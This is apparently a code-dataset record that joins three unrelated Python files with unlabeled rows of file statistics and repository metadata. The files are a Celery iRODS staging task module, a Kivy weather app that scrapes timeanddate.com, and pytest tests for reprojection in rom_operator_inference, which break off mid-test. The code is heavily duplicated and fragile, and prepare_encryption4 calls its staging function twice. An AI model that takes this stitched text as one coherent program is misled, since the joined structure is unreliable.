except Exception as e:
logging.info("Handling exception in move nfs")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return [app.current_task.request.id, transfer]
@app.task(bind=True)
def prepare_encryption4(self, transfer_output, input_data):
logging.info("Starting prepare input to iRODS")
try:
sys.stdout.write(
str(staging_api.prepare_input_to_iRODS2(transfer_output, input_data)))
except Exception as e:
logging.info("Handling exception in preparing input to iRODS")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return staging_api.prepare_input_to_iRODS2(transfer_output, input_data)
@app.task(bind=True)
def prepare_encryption5(self, transfer_output, input_data):
logging.info("Starting preparation for encryption api 5")
try:
data = staging_api.prepare_encryption5(transfer_output, input_data)
except Exception as e:
logging.info("Handling exception in encryption api preparation 5")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
data = self.request.chain
if data is not None:
logging.info(str(data))
last_task = str(data[0]["options"]["task_id"])
logging.info(last_task)
self.update_state(
task_id=last_task,
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
self.request.chain = None
raise Ignore()
return data
@app.task(bind=True)
def duplicate(self, input_data):
logging.info("Starting duplication")
try:
# duplication function
transfer = staging_api.duplicate(input_data)
except Exception as e:
logging.info("Handling exception in duplication")
logging.info("Dumping input data")
logging.info(input_data)
self.update_state(
state=states.FAILURE,
meta={
'custom': str(e),
'exc_type': type(e).__name__,
'exc_message': str(e)})
logging.info(str(self.AsyncResult(self.request.id).state))
raise Ignore()
return [app.current_task.request.id, transfer]
| 35.836066
| 90
| 0.573484
| 2,832
| 24,046
| 4.66596
| 0.041314
| 0.120705
| 0.040866
| 0.059028
| 0.909868
| 0.894506
| 0.886938
| 0.847662
| 0.823218
| 0.811185
| 0
| 0.004369
| 0.31473
| 24,046
| 670
| 91
| 35.889552
| 0.797548
| 0.008109
| 0
| 0.825243
| 0
| 0
| 0.1304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035599
| false
| 0
| 0.021036
| 0
| 0.092233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a29045b040ef64751b47142cf0c568a29fce1d6e
| 29,319
|
py
|
Python
|
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | null | null | null |
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | 1
|
2021-04-11T05:52:24.000Z
|
2021-04-11T05:52:24.000Z
|
Hava_Durumu/main.py
|
Canozguur/Weather-App
|
3794d73adbcb3718135185374b7686fb9f8bd1ab
|
[
"Unlicense"
] | null | null | null |
import requests
from bs4 import BeautifulSoup
from kivymd.app import MDApp
from kivymd.uix.screen import MDScreen
from kivymd.uix.card import MDCard
from kivy.uix.modalview import ModalView
from kivymd.uix.boxlayout import BoxLayout
from kivy.properties import StringProperty,BoundedNumericProperty,BooleanProperty
from kivy.uix.button import ButtonBehavior
from kivy.uix.image import Image
from kivy.core.window import Window
from kivymd.uix.label import Label
city = "istanbul"
url = 'https://www.timeanddate.com/weather/turkey/'+city
print(url)
hourly_url = url+"/hourly"
daily_url = url+"/ext"
Window.size = (350, 625)
class de(BoxLayout):
pass
class card_of_today(MDCard):
sunrise = StringProperty()
sunset = StringProperty()
wind = StringProperty()
feels_like = StringProperty()
status = StringProperty()
class card_of_hours(MDCard):
hour = StringProperty()
status_of_weather = StringProperty()
temp_of_hour = StringProperty()
bc_color = BooleanProperty()
text_color = BooleanProperty()
class card_of_daily(MDCard):
day = StringProperty()
temperature = StringProperty()
image = StringProperty()
color = BooleanProperty()
text_color = BooleanProperty()
class search(ModalView):
pass
days = {"Pzt":"Monday",
"Sal":"Tuesday",
"Çar":"Wednesday",
"Per":"Thursday",
"Cum":"Friday",
"Cmt":"Saturday",
"Paz":"Sunday"}
class MainScreen(MDScreen):
pass
class NewScreen(MDScreen):
pass
class ImageButton(ButtonBehavior, Image):
pass
class MainApp(MDApp):
def change_screen(self,text,situation):
print(situation)
if situation== True:
self.country_of_search = "usa"
else:
self.country_of_search = "turkey"
try:
self.screen_text = 'new_city_name_of_'+text
screen_of_new_city = MDScreen(name=f'new_city_name_of_{text}')
self.new_screen = de()
self.root.ids['screen_manager'].add_widget(screen_of_new_city)
screen_of_new_city.add_widget(self.new_screen)
city = str(text).lower()
url = 'https://www.timeanddate.com/weather/'+self.country_of_search +'/' + city
if requests.get(url).ok:
print(url)
self.hourly_url = url + "/hourly"
self.daily_url = url + "/ext"
self.new_screen.ids.city_name.text = city.title()
self.new_daily(self.daily_url)
self.background_time()
self.root.ids['new_screen'].ids.city.text = city.title()
self.root.ids['screen_manager'].current = self.screen_text
self.sea.dismiss()
else:
self.sea.ids['spot'].add_widget(Label(text="Not Founded",pos_hint={"center_x":.5,"center_y":.45},color=(0,122,122,1),font_size="22sp"))
except Exception:
self.sea.ids['spot'].add_widget(
Label(text="Not Founded", pos_hint={"center_x": .5, "center_y": .45}, color=(0, 0, 0, 1),font_size="22sp" ))
def new_daily(self,url):
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
img = tablo.find_all('img')
data = tablo.find_all('tr')
full_text = data[2].get_text()
#######
#####
###
##
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise, sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
" / ") + " temperature"
print(status)
# self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.new_screen.ids.feels_like.text = feels_like
self.new_screen.ids.sunrise.text = sunrise
self.new_screen.ids.sunset.text = sunset
self.new_screen.ids.wind.text = wind
self.new_screen.ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
" / ") + " temperature"
# self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.new_screen.ids.feels_like.text = feels_like
self.new_screen.ids.sunrise.text = sunrise
self.new_screen.ids.sunset.text = sunset
self.new_screen.ids.wind.text = wind
self.new_screen.ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
else:
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
" / ") + " temperature"
print(status)
# self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.new_screen.ids.feels_like.text = feels_like
self.new_screen.ids.sunrise.text = sunrise
self.new_screen.ids.sunset.text = sunset
self.new_screen.ids.wind.text = wind
self.new_screen.ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
####
###
###
###
###
self.new_hourly(self.hourly_url) ##### This code suppose to be here cause of i little bit comlicated the code
#######
####
###
for i in range(2, len(data) - 3):
j = i - 2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
print(src)
full_text = data[i].get_text()
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise, sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
if i == 2:
print(full_text)
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
self.new_screen.ids.daily.add_widget(
card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
text_color=self.text_color))
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.new_screen.ids.daily.add_widget(
card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
text_color=self.text_color))
else:
denemelik = situation[0]
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
# source = str(denemelik).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.new_screen.ids.daily.add_widget(
card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
text_color=self.text_color))
pass
def new_hourly(self,url):
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
data = tablo.find_all('tr')
img = tablo.find_all('img')
self.time = data[2].get_text()[:5]
self.background_time()
for i in range(3, len(data) - 1):
full_text = data[i].get_text()
hour = full_text[:5]
# here is gonna be as a different splitting cause of day
j = i - 2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
temp_of_hour = full_text[5:10]
new_text = full_text[10:]
new_text = str(new_text).split("°C")
feels_like = new_text[0]
feels_like = feels_like[:-4:-1]
status = new_text[0]
status = status[:-3]
wind = new_text[1]
wind = wind[0:7]
feels_like = feels_like[::-1]
new_temp = str(full_text).split("°C")[1].split(".")[-1].replace(" ","")+"°C"
print("time == ", hour)
print("Temperature of hour == ", new_temp)
print("situation of weather == ", status)
print("Feels like == ", feels_like)
print("Wind == ", wind)
print("*" * 40)
status = str(status).replace(" ", "_").replace(".", "").lower()
if int(str(hour)[0:2]) < 6 or int(str(hour)[0:2]) > 21:
morning = True
night = False
if str(hour[0:2]) == "00": # i am gonna put here png which is gonna be This New Day text thing
status = "weather_images/" +"new_day.png"
print("newday")
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=full_text[5:11],
bc_color=self.bc_color, text_color=self.text_color))
else:
src = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(src), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
else:
night = True
morning = False
print(status)
if status == "sprinkles_more_sun_than_clouds":
status = "rainy"
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
elif status == "sprinkles_partly_cloudy":
status = "rainy"
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
else:
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
pass
def new_one(self):
self.sea = search()
self.sea.open()
def background_time(self):
print(self.time)
print(self.sunrise)
print(self.sunset)
if int(self.time[0:2]) > int(self.sunrise[0:2]) and int(self.time[0:2])<= int(self.sunset[0:2]):
print("öğlen")
self.bc_color =(.1098, .650, .99215, 1)
self.text_color = (1,1,1,1)
else:
print("akşam")
self.bc_color =(.019,.11,.47 ,1)
self.text_color = (1,1,1,1)
def on_start(self):
self.daily(daily_url)
self.background_time()
def daily(self, url):
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
img = tablo.find_all('img')
data = tablo.find_all('tr')
full_text = data[2].get_text()
#######
#####
###
##
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise, sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
print(status)
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
else:
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
print(status)
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
####
###
###
###
###
self.hourly(hourly_url) ##### This code suppose to be here cause of i little bit comlicated the code
#######
####
###
for i in range(2, len(data) - 3):
j = i-2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg","") +".png"
print(src)
full_text = data[i].get_text()
sunset =full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise,sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
if i == 2:
print(full_text)
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
else:
denemelik = situation[0]
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
#source = str(denemelik).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
############
###########
#########
#######
##############
###########
#########
##########
#######
def hourly(self,url): # This is literally good for now without png spots
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
data = tablo.find_all('tr')
img = tablo.find_all('img')
self.time = data[2].get_text()[:5]
self.background_time()
for i in range(3, len(data) - 1):
full_text = data[i].get_text()
hour = full_text[:5]
print(full_text)
new_temp = str(full_text).split("°C")[1].split(".")[-1].replace(" ","")+"°C"
j = i - 2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
temp_of_hour = full_text[5:10]
new_text = full_text[10:]
new_text = str(new_text).split("°C")
feels_like = new_text[0]
feels_like = feels_like[:-4:-1]
status = new_text[0]
status = status[:-3]
wind = new_text[1]
wind = wind[0:7]
feels_like = feels_like[::-1]
print("time == ", hour)
print("Temperature of hour == ", new_temp)
print("situation of weather == ", status)
print("Feels like == ", feels_like)
print("Wind == ", wind)
print("*" * 40)
status = str(status).replace(" ", "_").replace(".", "").lower()
if int(str(hour)[0:2])<6 or int(str(hour)[0:2])>21 :
morning = True
night = False
if str(hour[0:2]) == "00": # i am gonna put here png which is gonna be This New Day text thing
status = "weather_images/" "new_day.png"
print("newday")
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=full_text[5:11],bc_color=self.bc_color,text_color=self.text_color))
else:
src = src = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(src), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
else:
night = True
morning = False
print(status)
if status == "sprinkles_more_sun_than_clouds":
status = "rainy"
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
elif status == "sprinkles_partly_cloudy":
status = "rainy"
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
else:
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
MainApp().run()
| 45.73947
| 206
| 0.518401
| 3,379
| 29,319
| 4.314294
| 0.068363
| 0.046303
| 0.074084
| 0.038071
| 0.871313
| 0.862121
| 0.851008
| 0.848265
| 0.845795
| 0.845795
| 0
| 0.019647
| 0.333367
| 29,319
| 640
| 207
| 45.810938
| 0.724891
| 0.075582
| 0
| 0.805447
| 0
| 0
| 0.098559
| 0.004918
| 0.001946
| 0
| 0
| 0
| 0
| 1
| 0.015564
| false
| 0.013619
| 0.023346
| 0
| 0.085603
| 0.196498
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2c9f0de5893f88b71fee3e4249054c63bd82c1b
| 4,971
|
py
|
Python
|
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | 2
|
2020-02-24T17:37:53.000Z
|
2020-05-17T23:26:45.000Z
|
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | null | null | null |
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | null | null | null |
# pre/test_reprojection.py
"""Tests for rom_operator_inference.pre._reprojection.py"""
import pytest
import numpy as np
from scipy import linalg as la
import rom_operator_inference as opinf
# Reprojection schemes ========================================================
def test_reproject_discrete(n=50, m=5, r=3):
"""Test pre._reprojection.reproject_discrete()."""
# Construct dummy operators.
k = 1 + r + r*(r+1)//2
D = np.diag(1 - np.logspace(-1, -2, n))
W = la.qr(np.random.normal(size=(n,n)))[0]
A = W.T @ D @ W
Ht = np.random.random((n,n,n))
H = (Ht + Ht.T) / 20
H = H.reshape((n, n**2))
B = np.random.random((n,m))
U = np.random.random((m,k))
B1d = np.random.random(n)
U1d = np.random.random(k)
Vr = np.eye(n)[:,:r]
x0 = np.zeros(n)
x0[0] = 1
# Try with bad initial condition shape.
with pytest.raises(ValueError) as exc:
opinf.pre.reproject_discrete(lambda x: x, Vr, x0[:-1], k)
assert exc.value.args[0] == "basis Vr and initial condition x0 not aligned"
# Linear case, no inputs.
def f(x):
return A @ x
X_ = opinf.pre.reproject_discrete(f, Vr, x0, k)
assert X_.shape == (r,k)
rom = opinf.InferredDiscreteROM("A").fit(Vr, X_)
assert np.allclose(Vr @ X_, rom.predict(X_[:,0], k))
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
# Linear case, 1D inputs.
def f(x, u):
return A @ x + B1d * u
X_ = opinf.pre.reproject_discrete(f, Vr, x0, k, U1d)
assert X_.shape == (r,k)
rom = opinf.InferredDiscreteROM("AB").fit(Vr, X_, U1d)
assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k, U1d))
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
assert np.allclose(rom.B_.flatten(), Vr.T @ B1d)
# Linear case, 2D inputs.
def f(x, u):
return A @ x + B @ u
X_ = opinf.pre.reproject_discrete(f, Vr, x0, k, U)
assert X_.shape == (r,k)
rom = opinf.InferredDiscreteROM("AB").fit(Vr, X_, U)
assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k, U))
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
assert np.allclose(rom.B_, Vr.T @ B)
# Quadratic case, no inputs.
def f(x):
return A @ x + H @ np.kron(x,x)
X_ = opinf.pre.reproject_discrete(f, Vr, x0, k)
assert X_.shape == (r,k)
rom = opinf.InferredDiscreteROM("AH").fit(Vr, X_)
assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k))
assert np.allclose(rom.A_, Vr.T @ A @ Vr, atol=1e-6, rtol=1e-6)
H_ = Vr.T @ H @ np.kron(Vr, Vr)
for _ in range(10):
x_ = np.random.random(r)
x2_ = np.kron(x_, x_)
assert np.allclose(rom.H_ @ opinf.utils.kron2c(x_), H_ @ x2_)
def test_reproject_continuous(n=100, m=20, r=10):
"""Test pre._reprojection.reproject_continuous()."""
# Construct dummy operators.
k = 1 + r + r*(r+1)//2
D = np.diag(1 - np.logspace(-1, -2, n))
W = la.qr(np.random.normal(size=(n,n)))[0]
A = W.T @ D @ W
Ht = np.random.random((n,n,n))
H = (Ht + Ht.T) / 20
H = H.reshape((n, n**2))
B = np.random.random((n,m))
U = np.random.random((m,k))
B1d = np.random.random(n)
U1d = np.random.random(k)
Vr = np.eye(n)[:,:r]
X = np.random.random((n,k))
# Try with bad initial condition shape.
with pytest.raises(ValueError) as exc:
opinf.pre.reproject_continuous(lambda x:x, Vr, X[:-1,:])
assert exc.value.args[0] == \
f"X and Vr not aligned, first dimension {n-1} != {n}"
# Linear case, no inputs.
def f(x):
return A @ x
X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X)
assert X_.shape == (r,k)
assert Xdot_.shape == (r,k)
rom = opinf.InferredContinuousROM("A").fit(Vr, X_, Xdot_)
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
# Linear case, 1D inputs.
def f(x, u):
return A @ x + B1d * u
X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X, U1d)
assert X_.shape == (r,k)
assert Xdot_.shape == (r,k)
rom = opinf.InferredContinuousROM("AB").fit(Vr, X_, Xdot_, U1d)
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
assert np.allclose(rom.B_.flatten(), Vr.T @ B1d)
# Linear case, 2D inputs.
def f(x, u):
return A @ x + B @ u
X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X, U)
assert X_.shape == (r,k)
assert Xdot_.shape == (r,k)
rom = opinf.InferredContinuousROM("AB").fit(Vr, X_, Xdot_, U)
assert np.allclose(rom.A_, Vr.T @ A @ Vr)
assert np.allclose(rom.B_, Vr.T @ B)
# Quadratic case, no inputs.
def f(x):
return A @ x + H @ np.kron(x,x)
X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X)
assert X_.shape == (r,k)
assert Xdot_.shape == (r,k)
rom = opinf.InferredContinuousROM("AH").fit(Vr, X_, Xdot_)
